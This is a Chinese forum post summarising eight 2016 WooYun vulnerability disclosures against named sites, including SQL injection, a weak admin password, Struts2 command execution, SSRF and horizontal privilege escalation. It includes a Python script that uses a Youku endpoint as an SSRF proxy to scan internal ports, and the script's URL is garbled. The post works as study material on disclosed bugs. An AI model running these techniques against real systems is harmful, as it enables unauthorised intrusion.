|
楼主 |
发表于 2020-3-1 23:29:11
|
显示全部楼层
wooyun总结03
### 1、成功的入侵事件
>缺陷编号:wooyun-2016-0228047
漏洞标题:一次对链路劫持的反击
#### 漏洞简述:
>简要描述:
起因是几个月前访问乌云和http网站时候网页播放蜜汁声音.当时还是dns劫持比较明显直接改dns就行,最近发现升级成为了链路劫持了,只能拔vpn过日子了。
DNS劫持:一般指域名劫持,通过攻击域名解析服务器DNS,或伪造域名解析服务器的方法,把目标网站域名解析到的错误的地址从而实现用户无法访问目标网站的目的。
具体的可以参考:[针对某电商网站流量劫持案例分析与思考](https://www.freebuf.com/vuls/62561.html)
### 2、SQL注入漏洞
>缺陷编号:wooyun-2016-0228222
漏洞标题:兴ye银行某站存在SQL注入![在这里插入图片描述]()
然后大佬在利用sqlmap对这个网站进行扫面,发现了数据库相关信息。
### 3、后台弱口令
>缺陷编号:wooyun-2016-0227552
漏洞标题:华夏航空准备网弱口令
账号与口令:test 123456
修复方法:修改
### 4、命令执行--Struts2
>缺陷编号:wooyun-2016-0227945
漏洞标题:神器而已之当当某站Struts2命令执行漏洞(绕过过滤)
所使用的工具:TangScan
#### 漏洞案例简述
![在这里插入图片描述](?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkwMTAzOA==,size_16,color_FFFFFF,t_70)
![在这里插入图片描述](?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkwMTAzOA==,size_16,color_FFFFFF,t_70)
抓包发现返回地网页是由提交的变量 name+...重定向构成的,因此构造 name后面的造成重定向发生错误,执行我们指定的命令后,产生特定的信息。
### 5、设计缺陷/逻辑错误
>缺陷编号:wooyun-2016-0227661
漏洞标题:宏信证券某处设计缺陷
#### 漏洞案例简述
![在这里插入图片描述]()
![在这里插入图片描述](?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkwMTAzOA==,size_16,color_FFFFFF,t_70)
**总结:** 溜达这个网址时候这个网站上已经啥也没有了(如下图,为网站显示的内容),百度了一下才发现网站似乎是搬了,域名换了。
![在这里插入图片描述]()
**总结:** 这个网站的注册功能尝试了一下,需要输入身份证信息,but可以任意输入身份证,,手机号注册时没有屏蔽任何号码,随意注册,竟然连12345678901都可以发生验证码。(关于厂商说的漏洞已修复我觉得很值得商榷一番。)
### 6、命令执行
>缺陷编号:wooyun-2016-0227883
进攻标题:优ku 多个分站存在SSRF突破大礼包
#### 漏洞案例简述
![在这里插入图片描述]()
可以发现大牛获取内网端口、ip等其他信息后, 构造了一个exp利用此网站对内网进行访问。
如下,是构造的对内网端口进行扫描的python脚本。
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-07-05 20:55:30
# @Last Modified by: Lcy
# @Last Modified time: 2016-07-11 09:28:01
import requests
import threading
import Queue
import time
threads_count = 1
que = Queue.Queue()
lock = threading.Lock()
threads = []
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
for i in ports:
que.put(str(i))
def run():
while que.qsize() > 0:
p = que.get()
try:
url = "http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=".format(
port=p)
time.sleep(0.3)
r = requests.get(url,timeout=1.8)
except:
lock.acquire()
print "{port} Open".format(port=p)
lock.release()
for i in range(threads_count):
t = threading.Thread(target=run)
threads.append(t)
t.setDaemon(True)
t.start()
while que.qsize() > 0:
time.sleep(1.0)
```
### 7、设计错误/逻辑错误--平行权限/水平越权
>缺陷编号:wooyun-2016-0227432
漏洞标题:花礼网某处平行权限漏洞(影响所有使用用户)
大佬注册了A、B两个用户,B为恶意用户,让A、B同时购买一个商品,当B生成订单再取消时,进行拦包,将B的id改为A的id,执行,取消的是A的账单而B的并没有被取消。
![在这里插入图片描述](?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzkwMTAzOA==,size_16,color_FFFFFF,t_70)
### 8、任意文件遍历/下载
>缺陷编号:wooyun-2016-0227704
漏洞标题:当当网某站点SSRF可以遍历本地文件
![在这里插入图片描述]()URL的构造如下:
![在这里插入图片描述]()
修复方案:限制协议和target
|
|